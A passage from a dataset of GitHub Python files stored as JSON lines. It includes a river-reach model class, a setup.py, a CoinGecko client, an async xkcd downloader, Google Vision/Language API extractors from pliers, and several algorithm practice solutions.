reachData.Expsd\n self.hasUpstreamLoading = False\n self.x = reachData.X\n self.y = reachData.Y\n self.massOutflowFileNeeded = None\n\n def unlink(self):\n \"\"\"\n Returns an \"unlinked\" copy of the reach, with all references to other reaches and the catchment set to None.\n \"\"\"\n cp = copy.copy(self)\n cp.downstreamRef = None\n cp.upstreamRef = None\n cp.signalStatusChange = None\n return(cp)\n\n def set_downstreamRef(self,reach):\n \"\"\"\n Sets the reference to a single downstream reach.\n \"\"\"\n if self.downstreamRef[reach.ID] is None: self.downstreamRef[reach.ID] = reach\n\n def set_upstreamRef(self,reach):\n \"\"\"\n Sets the reference to a single upstream reach.\n \"\"\"\n if not reach.ID in self.upstreamRef.keys(): self.upstreamRef[reach.ID] = reach\n\n @property\n def status(self):\n \"\"\"\n Returns the status of this reach.\n If the status waiting, it will be updated first, by checking the upstream reaches.\n NB: this function has the property decorator, meaning that if the reach status is \n accessed as reach.status, this function will be called.\n \"\"\"\n if self.stat == Reach.flagWaiting: self.checkStatus()\n return(self.stat)\n\n @status.setter\n def status(self, status):\n \"\"\"\n Sets status of this reach.\n If the status is done, the downstream reaches will be asked to update their status as well.\n If the status is (upstream)error: all downstream reaches will get upstream error.\n NB: this function has the setter decorator, meaning that if a reach status is set using \n reach.status = status, this function will be called.\n \"\"\"\n self.stat = status\n if not self.signalStatusChange is None: self.signalStatusChange(self)\n if status in [Reach.flagError, Reach.flagUpstreamError]:\n for reach in self.downstreamRefs: reach.status = Reach.flagUpstreamError\n elif status == Reach.flagRunDone:\n for reach in self.downstreamRefs: reach.checkStatus()\n for reach in self.upstreamRefs: reach.checkStatus()\n self.checkStatus()\n \n @property\n def upstreamRefs(self):\n \"\"\"\n Returns iterator over upstream reaches\n \"\"\"\n return(iter(self.upstreamRef.values()))\n\n @property\n def downstreamRefs(self):\n \"\"\"\n Returns iterator over downstream reaches\n \"\"\"\n return(iter(self.downstreamRef.values()))\n\n @property\n def skip(self):\n return(not(self.hasUpstreamLoading or self.hasDrift))\n\n def waterResidenceTime(self,waterDepth,flowRate):\n return self.waterVolume(waterDepth)/flowRate\n\n def waterVolume(self,waterDepth):\n return self.waterCrossSectionArea(waterDepth)*self.length\n\n def waterCrossSectionArea(self,waterDepth):\n return waterDepth*(self.width + waterDepth*self.slope)\n\n def checkStatus(self):\n \"\"\"\n Checks status for this reach, by looking at the upstream and downstream reaches.\n If the current status is runDone and all downstream reaches are runDone as well, the status\n is set to canBeCleaned. \n If the status is all upstream reaches have status runDone or done, this reach will get status canStart.\n If any of the upstream reaches has status (upstream)error this reach will get status upstreamError\n \"\"\"\n\n if self.stat == Reach.flagRunDone:\n if not self.downstreamRefs or all([reach.status in [Reach.flagRunDone, Reach.flagDone] for reach in self.downstreamRefs]):\n self.status = Reach.flagCanBeCleaned\n elif self.stat == Reach.flagWaiting:\n if not self.upstreamRef or all([reach.status in [Reach.flagRunDone, Reach.flagDone] for reach in self.upstreamRefs]):\n self.status = Reach.flagCanStart\n elif any([reach.status in [Reach.flagError, Reach.flagUpstreamError] for reach in self.upstreamRefs]):\n self.status = Reach.flagUpstreamError\n\n def set_hasUpstreamLoading(self,flag = False):\n self.hasUpstreamLoading = flag or self.hasUpstreamLoading\n for reach in self.downstreamRefs:\n reach.set_hasUpstreamLoading(self.hasUpstreamLoading or self.hasDrift)\n\n def set_massOutflowFileNeeded(self):\n self.massOutflowFileNeeded = any([not reach.skip for reach in self.downstreamRefs])","repo_name":"xlandscape/CascadeToxswa-Component","sub_path":"module/src/Catchment.py","file_name":"Catchment.py","file_ext":"py","file_size_in_byte":14295,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"28082961058","text":"import os\nfrom setuptools import setup, find_packages\n\n# allow setup.py to be run from any path\nos.chdir(os.path.normpath(os.path.join(os.path.abspath(__file__), os.pardir)))\n\nwith open('requirements.txt') as f:\n install_requires = f.read().splitlines()\n\nsetup(\n name='django-simple-activity',\n version='1.1.1.dev0',\n packages=find_packages('src', exclude=('tests',)),\n package_dir={'': 'src'},\n include_package_data=True,\n license='Apache 2.0',\n description=(\n 'Simple, generic, activity streams '\n 'from the actions on your site.'),\n url='https://github.com/richardasaurus/django-simple-activity',\n author='Richard O\\'Dwyer',\n author_email='richard@richard.do',\n zip_safe=True,\n install_requires=install_requires\n)\n","repo_name":"richardARPANET/django-simple-activity","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":770,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"8701903908","text":"import requests\n\nfrom clients.currency.coingecko.defs import CoinGeckoCrypto\nfrom clients.currency.coingecko.exceptions import CoinGeckoRequestException\nfrom moneybox.settings import COINGECKO_URL, COINGECKO_TIMEOUT\nfrom wallet.models.currency import FiatCurrency\n\n\nclass CoinGeckoClient:\n def __init__(self, url: str = COINGECKO_URL, timeout: int = COINGECKO_TIMEOUT) -> None:\n self.url = url\n self.timeout = timeout\n\n def get_rates(self):\n try:\n response = requests.get(\n url=self.url.format(\n crypto_currencies=\",\".join(CoinGeckoCrypto.map_main_crypto_to_coingecko().values()),\n fiat_currency=FiatCurrency.RUB,\n ),\n timeout=self.timeout,\n )\n rates = response.json()\n except requests.exceptions.RequestException as e:\n raise CoinGeckoRequestException(e)\n result = dict()\n for k, v in rates.items():\n result[CoinGeckoCrypto.map_coingecko_to_main_crypto(k)] = round(v.get(FiatCurrency.RUB.lower()), 4)\n return result\n\n\ncoingecko_client = CoinGeckoClient()\n","repo_name":"tanja-ovc/django-moneybox","sub_path":"moneybox/clients/currency/coingecko/coingecko.py","file_name":"coingecko.py","file_ext":"py","file_size_in_byte":1149,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"}
+{"seq_id":"20351688594","text":"import sys\nimport heapq\n\ninput = sys.stdin.readline\n\n\nclass Voca:\n def __init__(self, voca):\n self.voca = voca\n\n def __lt__(self, other):\n return self.voca.lower() < other.voca.lower()\n\n\nif __name__ == \"__main__\":\n while True:\n t = int(input().strip())\n if t == 0:\n break\n que = []\n for _ in range(t):\n voca = Voca(input().strip())\n heapq.heappush(que, voca)\n answer: Voca = heapq.heappop(que)\n print(answer.voca)\n","repo_name":"Alphanewbie/TIL","sub_path":"Algorithm_problem_solving/Baek-joon/2204/2204.py","file_name":"2204.py","file_ext":"py","file_size_in_byte":512,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"17416527332","text":"import aiohttp\nimport asyncio\nimport time\n\nrecord=open(\"Task2_AsyncTime.txt\",\"w\")\nfilename = \"Task2_Async.txt\" # create a file with a unique name\nf=open(filename,'a') #APPENDING A SINGLE FILE SINCE I'M NOT SURE IF CREATING 200 FILES WOULD BE A GOOD IDEA\n\nasync def getOnePage(session,comic_id: int):\n url = f\"https://xkcd.com/{comic_id}/info.0.json\"\n async with session.get(url) as sesh:\n content=await sesh.read()\n print(content,file=f) #writing contents into the file one by one here\n print(f\"Begin downloading {url}\")\n result=await sesh.json()\n print(f\"Finished downloading {url}\")\n return result\n\nasync def getAllPages(session):\n tasks=[] #creating a dynamic array to store all the tasks we want to rin parallely\n for i in range(1,201): #will take values 1-200 in loop\n task=asyncio.create_task(getOnePage(session,i))\n tasks.append(task)\n \n \n results= await asyncio.gather(*tasks) #pointing to the list so that all the members are defined as async task\n return results\n\nasync def Main():\n async with aiohttp.ClientSession() as sesh:\n downloads = await getAllPages(sesh)\n return downloads\n\n\nif __name__ == \"__main__\":\n start=time.time()\n finalresult=asyncio.run(Main())\n timeTaken=time.time()-start\n print(f\"Time taken= {timeTaken:0.2f} seconds\")\n record.writelines(str(timeTaken)+\"\\n\")\n record.close\n\n\n\n \n","repo_name":"JebronLames32/KOSS_Task","sub_path":"Task2/Task1_Writeinfile_async.py","file_name":"Task1_Writeinfile_async.py","file_ext":"py","file_size_in_byte":1481,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"27986984594","text":"''' Google API-based feature extraction classes. '''\n\nimport logging\nimport time\nimport warnings\nimport os\nfrom collections import defaultdict\n\nimport numpy as np\nimport pandas as pd\n\nfrom pliers.extractors.image import ImageExtractor\nfrom pliers.extractors.text import TextExtractor\nfrom pliers.extractors.video import VideoExtractor\nfrom pliers.transformers import (GoogleAPITransformer,\n GoogleVisionAPITransformer,\n GoogleAPITransformer)\nfrom pliers.extractors.base import ExtractorResult\nfrom pliers.utils import flatten_dict\n\n\nclass GoogleVisionAPIExtractor(GoogleVisionAPITransformer, ImageExtractor):\n\n ''' Base class for all Extractors that use the Google Vision API. '''\n\n VERSION = '1.0'\n\n def _extract(self, stims):\n request = self._build_request(stims)\n responses = self._query_api(request)\n\n results = []\n for i, response in enumerate(responses):\n if response and self.response_object in response:\n raw = response[self.response_object]\n results.append(ExtractorResult(raw, stims[i], self))\n elif 'error' in response:\n raise Exception(response['error']['message'])\n else:\n results.append(ExtractorResult([{}], stims[i], self))\n\n return results\n\n\nclass GoogleVisionAPIFaceExtractor(GoogleVisionAPIExtractor):\n\n ''' Identifies faces in images using the Google Cloud Vision API. '''\n\n request_type = 'FACE_DETECTION'\n response_object = 'faceAnnotations'\n\n def _to_df(self, result, handle_annotations=None):\n '''\n Converts a Google API Face JSON response into a Pandas Dataframe.\n\n Args:\n result (ExtractorResult): Result object from which to parse out a\n Dataframe.\n handle_annotations (str): How returned face annotations should be\n handled in cases where there are multiple faces.\n 'first' indicates to only use the first face JSON object, all\n other values will default to including every face.\n '''\n annotations = result._data\n if handle_annotations == 'first':\n annotations = [annotations[0]]\n\n face_results = []\n for i, annotation in enumerate(annotations):\n data_dict = {}\n for field, val in annotation.items():\n if 'Confidence' in field:\n data_dict['face_' + field] = val\n elif 'oundingPoly' in field:\n for j, vertex in enumerate(val['vertices']):\n for dim in ['x', 'y']:\n name = '%s_vertex%d_%s' % (field, j+1, dim)\n val = vertex[dim] if dim in vertex else np.nan\n data_dict[name] = val\n elif field == 'landmarks':\n for lm in val:\n if 'type' in lm:\n name = 'landmark_' + lm['type'] + '_%s'\n lm_pos = {name %\n k: v for (k, v) in lm['position'].items()}\n data_dict.update(lm_pos)\n else:\n data_dict[field] = val\n\n face_results.append(data_dict)\n\n return pd.DataFrame(face_results)\n\n\nclass GoogleVisionAPILabelExtractor(GoogleVisionAPIExtractor):\n\n ''' Labels objects in images using the Google Cloud Vision API. '''\n\n request_type = 'LABEL_DETECTION'\n response_object = 'labelAnnotations'\n\n def _to_df(self, result):\n res = {label['description']: label['score'] for label in result._data if label}\n return pd.DataFrame([res])\n\n\nclass GoogleVisionAPIPropertyExtractor(GoogleVisionAPIExtractor):\n\n ''' Extracts image properties using the Google Cloud Vision API. '''\n\n request_type = 'IMAGE_PROPERTIES'\n response_object = 'imagePropertiesAnnotation'\n\n def _to_df(self, result):\n colors = result._data['dominantColors']['colors']\n data_dict = {}\n for color in colors:\n rgb = color['color']\n key = [rgb.get('red', 0), rgb.get('green', 0), rgb.get('blue', 0)]\n key = ', '.join([str(v) for v in key])\n data_dict[key] = color['score']\n return pd.DataFrame([data_dict])\n\n\nclass GoogleVisionAPISafeSearchExtractor(GoogleVisionAPIExtractor):\n\n ''' Extracts safe search detection using the Google Cloud Vision API. '''\n\n request_type = 'SAFE_SEARCH_DETECTION'\n response_object = 'safeSearchAnnotation'\n\n def _to_df(self, result):\n return pd.DataFrame([result._data])\n\n\nclass GoogleVisionAPIWebEntitiesExtractor(GoogleVisionAPIExtractor):\n\n ''' Extracts web entities using the Google Cloud Vision API. '''\n\n request_type = 'WEB_DETECTION'\n response_object = 'webDetection'\n\n def _to_df(self, result):\n data_dict = {}\n if 'webEntities' in result._data:\n for entity in result._data['webEntities']:\n if 'description' in entity and 'score' in entity:\n data_dict[entity['description']] = entity['score']\n return pd.DataFrame([data_dict])\n\n\nclass GoogleVideoIntelligenceAPIExtractor(GoogleAPITransformer, VideoExtractor):\n\n ''' Extracts object features from videos using the Google Vision Video\n Intelligence API.\n\n Args:\n features (list): List of features to extract. LABEL_DETECTION extracts\n tags present throughout the provided segments (full video if none\n provided) as well as throughout the shots (depending on config).\n SHOT_CHANGE_DETECTION extracts a shot feature with onsets and\n durations corresponding to shot changes in the video.\n EXPLICIT_CONTENT_DETECTION extracts any frame onsets of explicit\n material.\n segments (list): List of JSON objects or dictionaries. Each dictionary\n should contain a startTimeOffset and an endTimeOffset field with\n timestamps of the format XX.XXs marking the desired segments upon\n which to extract features.\n config (dict): JSON object representing the desired configuration for\n extraction. See the Google Cloud Video Intelligence documentation\n for more details.\n timeout (int): Number of seconds to wait for video intelligence\n operation to finish. Defaults to 90 seconds.\n request_rate (int): Number of seconds to wait between polling the\n extraction operation for completion.\n discovery_file (str): path to discovery file containing Google\n application credentials.\n api_version (str): API version to use.\n max_results (int): Max number of results per page.\n num_retries (int): Number of times to retry query on failure.\n rate_limit (int): The minimum number of seconds required between\n transform calls on this Transformer.\n '''\n\n api_name = 'videointelligence'\n _log_attributes = ('discovery_file', 'api_version', 'features', 'segments',\n 'config', 'timeout', 'request_rate')\n\n def __init__(self, features=['LABEL_DETECTION', 'SHOT_CHANGE_DETECTION',\n 'EXPLICIT_CONTENT_DETECTION'],\n segments=None, config=None, timeout=90, request_rate=5,\n discovery_file=None, api_version='v1', max_results=100,\n num_retries=3, rate_limit=None):\n self.features = features\n self.segments = segments\n self.config = config\n self.timeout = timeout\n self.request_rate = request_rate\n super().__init__(discovery_file=discovery_file,\n api_version=api_version,\n max_results=max_results,\n num_retries=num_retries,\n rate_limit=rate_limit)\n\n def _query_api(self, request):\n request_obj = self.service.videos().annotate(body=request)\n return request_obj.execute(num_retries=self.num_retries)\n\n def _query_operations(self, name):\n if hasattr(self.service.operations(), 'get'):\n request_obj = self.service.operations().get(name=name)\n else:\n request_obj = self.service.projects().locations().\\\n operations().get(name=name)\n return request_obj.execute(num_retries=self.num_retries)\n\n def _build_request(self, stim):\n\n context = self.config if self.config else {}\n if self.segments:\n context['segments'] = self.segments\n\n with stim.get_filename() as filename:\n size = os.path.getsize(filename)\n LIMIT = 524288000\n if size > LIMIT:\n warnings.warn(\"Video file is very large ({} bytes) and may \"\n \"exceed the Google Video Intelligence payload \"\n \"limit ({} bytes).\".format(size, LIMIT))\n\n request = {\n 'inputContent': stim.get_bytestring(),\n 'features': self.features,\n 'videoContext': context\n }\n\n return request\n\n def _extract(self, stim):\n op_request = self._build_request(stim)\n operation = self._query_api(op_request)\n\n msg = \"Beginning video extraction with a timeout of %fs. Even for \"\\\n \"small videos, full extraction may take awhile.\" % self.timeout\n logging.warning(msg)\n\n operation_start = time.time()\n response = self._query_operations(operation['name'])\n while 'done' not in response and \\\n (time.time() - operation_start) < self.timeout:\n response = self._query_operations(operation['name'])\n time.sleep(self.request_rate)\n\n if (time.time() - operation_start) >= self.timeout:\n msg = \"The extraction reached the timeout limit of %fs, which \"\\\n \"means the API may not have finished analyzing the video \"\\\n \"and the results may be empty or incomplete.\" % self.timeout\n logging.warning(msg)\n\n return ExtractorResult(response, stim, self)\n\n def _get_onset_duration(self, timing_json):\n onset = float(timing_json['startTimeOffset'][:-1])\n end = float(timing_json['endTimeOffset'][:-1])\n return onset, (end - onset)\n\n def _parse_label(self, data, features, label):\n for segment in label.get('segments', []):\n onset, duration = self._get_onset_duration(segment['segment'])\n score = segment['confidence']\n data[(onset, duration)].update({f: score for f in features})\n\n def _parse_frame(self, data, features, annotation, score_key, max_time):\n frames = annotation.get('frames', [])\n for i, frame in enumerate(frames):\n onset = float(frame['timeOffset'][:-1])\n if (i + 1) == len(frames):\n end = max_time\n else:\n end = float(frames[i+1]['timeOffset'][:-1])\n duration = end - onset\n score = frame[score_key]\n data[(onset, duration)].update({f: score for f in features})\n\n def _to_df(self, result):\n response = result._data.get('response', {})\n data = defaultdict(dict)\n for r in response.get('annotationResults', []):\n for key, res in r.items():\n if 'Label' in key:\n for annot in res:\n feats = [annot['entity']['description']]\n for category in annot.get('categoryEntities', []):\n feats.append('category_' + category['description'])\n if key == 'frameLabelAnnotations':\n self._parse_frame(data, feats, annot, 'confidence',\n result.stim.duration)\n else:\n # Good for shot or segment labels\n self._parse_label(data, feats, annot)\n elif key == 'shotAnnotations':\n for i, shot in enumerate(res):\n onset, duration = self._get_onset_duration(shot)\n data[(onset, duration)].update({\n 'shot_id': i\n })\n elif key == 'explicitAnnotation':\n feature = 'pornographyLikelihood'\n self._parse_frame(data, [feature], res, feature,\n result.stim.duration)\n\n df = pd.DataFrame(list(data.values()))\n # If multiple confidences were parsed, uses the last one\n if len(data) > 0:\n onsets, durations = zip(*list(data.keys()))\n result._onsets = onsets\n result._durations = durations\n result.features = list(df.columns)\n return df\n\n\nclass GoogleVideoAPILabelDetectionExtractor(GoogleVideoIntelligenceAPIExtractor):\n\n ''' Extracts image labels using the Google Video Intelligence API '''\n\n def __init__(self, mode='SHOT_MODE', stationary_camera=False,\n segments=None, timeout=90, request_rate=5, num_retries=3,\n discovery_file=None, api_version='v1', max_results=100,\n rate_limit=None, frame_confidence_threshold=None,\n video_confidence_threshold=None):\n\n config = {\n 'labelDetectionConfig': {\n 'labelDetectionMode': mode,\n 'stationaryCamera': stationary_camera\n }\n }\n\n if frame_confidence_threshold is not None:\n if mode not in ['FRAME_MODE', 'SHOT_AND_FRAME_MODE']:\n raise ValueError(\n \"frame_confidence_threshold can only be specified in\"\n \"FRAME or SHOT_AND_FRAME modes.\")\n else:\n config['labelDetectionConfig']['frameConfidenceThreshold'] = \\\n frame_confidence_threshold\n\n if video_confidence_threshold is not None:\n if mode not in ['SHOT_MODE', 'SHOT_AND_FRAME_MODE']:\n raise ValueError(\n \"video_confidence_threshold can only be specified in\"\n \"SHOT or SHOT_AND_FRAME modes.\")\n else:\n config['labelDetectionConfig']['videoConfidenceThreshold'] = \\\n video_confidence_threshold\n\n super().__init__(features=['LABEL_DETECTION'],\n segments=segments,\n config=config,\n timeout=timeout,\n request_rate=request_rate,\n discovery_file=discovery_file,\n api_version=api_version,\n max_results=max_results,\n num_retries=num_retries,\n rate_limit=rate_limit)\n\n\nclass GoogleVideoAPIShotDetectionExtractor(GoogleVideoIntelligenceAPIExtractor):\n\n ''' Extracts shot changes using the Google Video Intelligence API '''\n\n def __init__(self, segments=None, config=None, timeout=90, request_rate=5,\n discovery_file=None, api_version='v1', max_results=100,\n num_retries=3, rate_limit=None):\n super().__init__(features=['SHOT_CHANGE_DETECTION'],\n segments=segments,\n config=config,\n timeout=timeout,\n request_rate=request_rate,\n discovery_file=discovery_file,\n api_version=api_version,\n max_results=max_results,\n num_retries=num_retries,\n rate_limit=rate_limit)\n\n\nclass GoogleVideoAPIExplicitDetectionExtractor(GoogleVideoIntelligenceAPIExtractor):\n\n ''' Extracts explicit content using the Google Video Intelligence API '''\n\n def __init__(self, segments=None, config=None, timeout=90, request_rate=5,\n discovery_file=None, api_version='v1', max_results=100,\n num_retries=3, rate_limit=None):\n super().__init__(features=['EXPLICIT_CONTENT_DETECTION'],\n segments=segments,\n config=config,\n timeout=timeout,\n request_rate=request_rate,\n discovery_file=discovery_file,\n api_version=api_version,\n max_results=max_results,\n num_retries=num_retries,\n rate_limit=rate_limit)\n\n\nclass GoogleLanguageAPIExtractor(GoogleAPITransformer, TextExtractor):\n\n ''' Extracts natural language features from text documents using the\n Google Natural Language API.\n\n Args:\n features (list): List of features (str) to extract. Available\n features: extractSyntax, extractEntities, extractDocumentSentiment,\n extractEntitySentiment, and classifyText. See Google Natural\n Language API documentation for more details.\n language (str): The ISO-639-1 or BCP-47 identifier for the document\n language. If None is provided, API auto-detects the language.\n is_html (bool): When True, the document's text is expected to be\n HTML. Otherwise, plain text is assumed.\n discovery_file (str): path to discovery file containing Google\n application credentials.\n api_version (str): API version to use.\n max_results (int): Max number of results per page.\n num_retries (int): Number of times to retry query on failure.\n rate_limit (int): The minimum number of seconds required between\n transform calls on this Transformer.\n '''\n\n api_name = 'language'\n _log_attributes = ('discovery_file', 'api_version', 'features',\n 'language', 'is_html')\n\n def __init__(self, features=['extractSyntax',\n 'extractEntities',\n 'extractDocumentSentiment',\n 'extractEntitySentiment',\n 'classifyText'],\n language=None, is_html=False, discovery_file=None,\n api_version='v1', max_results=100,\n num_retries=3, rate_limit=None):\n self.features = features\n self.language = language\n self.is_html = is_html\n super().__init__(discovery_file=discovery_file,\n api_version=api_version,\n max_results=max_results,\n num_retries=num_retries,\n rate_limit=rate_limit)\n\n def _query_api(self, request):\n request_obj = self.service.documents().annotateText(body=request)\n return request_obj.execute(num_retries=self.num_retries)\n\n def _build_request(self, stim):\n document = {\n 'type' : 'HTML' if self.is_html else 'PLAIN_TEXT',\n 'content' : stim.text\n }\n\n if self.language:\n document['language'] = self.language\n\n request = {\n 'document': document,\n 'features': { f : True for f in self.features },\n 'encodingType': 'UTF32'\n }\n\n return request\n\n def _extract(self, stim):\n request = self._build_request(stim)\n response = self._query_api(request)\n return ExtractorResult(response, stim, self)\n\n def _get_span(self, text_json):\n offset = text_json['text']['beginOffset']\n content = text_json['text']['content']\n return { 'begin_char_index' : offset,\n 'end_char_index' : offset + len(content),\n 'text' : content }\n\n def _to_df(self, result):\n response = result._data\n data = []\n\n # One row/object for all document-level features\n document_data = {}\n\n if 'extractDocumentSentiment' in self.features:\n sentiment = response['documentSentiment']\n document_data.update(flatten_dict(sentiment, 'sentiment'))\n\n # Sentence level sentiment\n for sentence in response.get('sentences', []):\n sentence_data = self._get_span(sentence)\n sentiment = sentence['sentiment']\n sentence_data.update(flatten_dict(sentiment, 'sentiment'))\n data.append(sentence_data)\n\n for category in response.get('categories'):\n key = 'category_%s' % category['name']\n document_data[key] = category['confidence']\n\n # Include only if there are document-level features\n if document_data:\n data.append(document_data)\n\n # Entity-level features\n for entity in response.get('entities', []):\n entity_copy = entity.copy()\n mentions = entity_copy.pop('mentions', [])\n entity_copy.pop('name', None)\n entity_copy = flatten_dict(entity_copy)\n\n for m in mentions:\n entity_data = self._get_span(m)\n entity_data.update(entity_copy)\n # Overwrite top-level sentiment with mention-level\n sentiment = m.get('sentiment', {})\n entity_data.update(flatten_dict(sentiment, 'sentiment'))\n data.append(entity_data)\n\n # Token-level syntax features\n for token in response.get('tokens', []):\n token_data = self._get_span(token)\n token_data['lemma'] = token['lemma']\n token_data.update(token['partOfSpeech'])\n dependency = flatten_dict(token['dependencyEdge'], 'dependency')\n token_data.update(dependency)\n data.append(token_data)\n\n df = pd.DataFrame(data)\n df['language'] = response['language']\n return df\n\n\nclass GoogleLanguageAPIEntityExtractor(GoogleLanguageAPIExtractor):\n\n ''' Extracts entity labels in text using the Google Language API '''\n\n def __init__(self, language=None, is_html=False, discovery_file=None,\n api_version='v1', max_results=100, num_retries=3,\n rate_limit=None):\n super().__init__(features=['extractEntities'],\n language=language,\n is_html=is_html,\n discovery_file=discovery_file,\n api_version=api_version,\n max_results=max_results,\n num_retries=num_retries,\n rate_limit=rate_limit)\n\n\nclass GoogleLanguageAPISentimentExtractor(GoogleLanguageAPIExtractor):\n\n ''' Extracts sentiment of text using the Google Language API '''\n\n def __init__(self, language=None, is_html=False, discovery_file=None,\n api_version='v1', max_results=100, num_retries=3,\n rate_limit=None):\n super().__init__(features=['extractDocumentSentiment'],\n language=language,\n is_html=is_html,\n discovery_file=discovery_file,\n api_version=api_version,\n max_results=max_results,\n num_retries=num_retries,\n rate_limit=rate_limit)\n\n\nclass GoogleLanguageAPISyntaxExtractor(GoogleLanguageAPIExtractor):\n\n ''' Extracts syntax properties of text using the Google Language API '''\n\n def __init__(self, language=None, is_html=False, discovery_file=None,\n api_version='v1', max_results=100, num_retries=3,\n rate_limit=None):\n super().__init__(features=['extractSyntax'],\n language=language,\n is_html=is_html,\n discovery_file=discovery_file,\n api_version=api_version,\n max_results=max_results,\n num_retries=num_retries,\n rate_limit=rate_limit)\n\n\nclass GoogleLanguageAPITextCategoryExtractor(GoogleLanguageAPIExtractor):\n\n ''' Extracts document category using the Google Language API.\n See the API documentation for the taxonomy of categories:\n https://cloud.google.com/natural-language/docs/categories '''\n\n def __init__(self, language=None, is_html=False, discovery_file=None,\n api_version='v1', max_results=100, num_retries=3,\n rate_limit=None):\n super().__init__(features=['classifyText'],\n language=language,\n is_html=is_html,\n discovery_file=discovery_file,\n api_version=api_version,\n max_results=max_results,\n num_retries=num_retries,\n rate_limit=rate_limit)\n\n\nclass GoogleLanguageAPIEntitySentimentExtractor(GoogleLanguageAPIExtractor):\n\n ''' Extracts sentiment of entities found in text using the Google Language\n API. Produces identical results to the entity extractor but with additional\n sentiment analysis. '''\n\n def __init__(self, language=None, is_html=False, discovery_file=None,\n api_version='v1', max_results=100, num_retries=3,\n rate_limit=None):\n super().__init__(features=['extractEntitySentiment'],\n language=language,\n is_html=is_html,\n discovery_file=discovery_file,\n api_version=api_version,\n max_results=max_results,\n num_retries=num_retries,\n rate_limit=rate_limit)\n","repo_name":"PsychoinformaticsLab/pliers","sub_path":"pliers/extractors/api/google.py","file_name":"google.py","file_ext":"py","file_size_in_byte":26007,"program_lang":"python","lang":"en","doc_type":"code","stars":288,"dataset":"github-code","pt":"53"}
+{"seq_id":"23915777194","text":"\"\"\"\nLeetcode #108 Convert Sorted Array to Binary Search Tree\n\nGiven an integer array nums where the elements are \nsorted in ascending order, convert it to a height-balanced \nbinary search tree.\n\nA height-balanced binary tree is a binary tree in which the \ndepth of the two subtrees of every node never differs by \nmore than one.\n\nExample 1:\nInput: nums = [-10,-3,0,5,9]\nOutput: [0,-3,9,-10,null,5]\nExplanation: [0,-10,5,null,-3,null,9] is also accepted:\n\nExample 2:\nInput: nums = [1,3]\nOutput: [3,1]\nExplanation: [1,null,3] and [3,1] are both height-balanced BSTs.\n\nConstraints:\n1 <= nums.length <= 104\n-104 <= nums[i] <= 104\nnums is sorted in a strictly increasing order.\n\nAlgorithm/DS used: Binary search using midpoint for creating a \nnode and stack for traversal\n\nO(N) worst case time where N is the length of nums\n\nO(N) worst case space where N is the length of nums\n\n\"\"\"\nfrom typing import List\nfrom typing import Tuple\nfrom collections import deque\n\n\n# Definition for a binary tree node.\nclass TreeNode:\n def __init__(self, val=0, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\n\n\nclass Solution:\n def _createNodeFromMidpoint(self, nums: List[int]) -> Tuple[TreeNode, List, List]:\n if not nums:\n return (None, [], [])\n m = len(nums) // 2\n return (TreeNode(val=nums[m]), nums[:m], nums[m+1:])\n\n def sortedArrayToBST(self, nums: List[int]) -> TreeNode:\n if not nums:\n return None\n m = len(nums) // 2\n root = TreeNode(val=nums[m])\n s = [(root, nums[:m], nums[m+1:])]\n while s:\n current = s.pop()\n left = self._createNodeFromMidpoint(current[1])\n right = self._createNodeFromMidpoint(current[2])\n current[0].left = left[0]\n current[0].right = right[0]\n if left[0]:\n s.append(left)\n if right[0]:\n s.append(right)\n return root\n\n\ndef breadth_first_traverse(root: TreeNode) -> List:\n result = []\n q = deque()\n q.append(root)\n while q:\n current = q.popleft()\n if not current:\n result.append(current)\n elif current:\n result.append(current.val)\n if current.left or current.right:\n q.append(current.left)\n q.append(current.right)\n return result\n\n\ndef test_solution():\n s = Solution()\n print(\"Expected result from input [-10,-3,0,5,9] is [0,-3,9,-10,None,5, None] and the Actual result is: \" +\n str(breadth_first_traverse(s.sortedArrayToBST([-10, -3, 0, 5, 9]))))\n assert breadth_first_traverse(s.sortedArrayToBST(\n [-10, -3, 0, 5, 9])) == [0, -3, 9, -10, None, 5, None]\n assert breadth_first_traverse(s.sortedArrayToBST(\n [1, 3])) == [3, 1, None]\n\n # Insert more tests here...\n\n\nif __name__ == \"__main__\":\n test_solution()\n","repo_name":"JacksonJW/practice-problems-interview-prep","sub_path":"leetcode/python3/convert_sorted_array_to_binary_search_tree.py","file_name":"convert_sorted_array_to_binary_search_tree.py","file_ext":"py","file_size_in_byte":2910,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"33280821155","text":"# O(n) time | O(1) space - where n is the length of the input ar\r\n\r\ndef hasSingleCycle(array):\r\n\tnumElementsVisited = 0\r\n\tcurrentIdx = 0\r\n\twhile numElementsVisited < len(array):\r\n\t\tif numElementsVisited > 0 and currentIdx == 0:\r\n\t\t\treturn False\r\n\t\tnumElementsVisited += 1\r\n\t\tcurrentIdx = getNextIdx(currentIdx, array)\r\n\treturn currentIdx == 0\r\n\r\ndef getNextIdx(currentIdx, array):\r\n\tjump = array[currentIdx]\r\n\tnextIdx = (currentIdx + jump) % len(array)\r\n\treturn nextIdx if nextIdx >= 0 else nextIdx + len(array)","repo_name":"Abhishek-Rout/Competitive-Coding","sub_path":"AlgoExpert/2. Medium/Python/Single Cycle Check/Single Cycle Check.py","file_name":"Single Cycle Check.py","file_ext":"py","file_size_in_byte":511,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"53"}
